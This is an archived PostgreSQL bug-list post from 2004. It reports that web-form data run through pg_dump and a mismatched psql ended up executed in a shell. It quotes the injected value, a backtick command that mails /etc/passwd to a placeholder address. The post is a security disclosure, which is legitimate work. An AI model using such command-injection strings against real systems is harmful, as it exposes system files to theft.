Home > mailing lists

syntax error causes crafted data to be executed in shell - Mailing list pgsql-bugs

From	Thomer M. Gil
Subject	syntax error causes crafted data to be executed in shell
Date	December 17, 2004 21:38:16
Msg-id	20041217183802.GA26196@dataloss.thomer.com Whole thread Raw
Responses	Re: syntax error causes crafted data to be executed in shell (Tom Lane <tgl@sss.pgh.pa.us>)
List	pgsql-bugs

Tree view

Short summary:

    1.  Someone wrote "`mail blah@blah.com < /etc/passwd`" in a web form;
        this string was stored in a postgresql database.
    2.  We ran pg_dump
    3.  We ran psql (not the same version as pg_dump!)
    4.  blah@blah.com receives /etc/passwd

More details and the, in my opinion, somewhat reckless response by one
of the Debian postgresql package maintainers are available at:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=285844

Thank you,

Thomer

pgsql-bugs by date:

From: Tom Lane
Date: 17 December 2004, 20:06:16
Subject: Re: posgresql 8.0 RC1 missing schemas

From: Tom Lane
Date: 17 December 2004, 22:32:28
Subject: Re: syntax error causes crafted data to be executed in shell

syntax error causes crafted data to be executed in shell - Mailing list pgsql-bugs

Previous

Next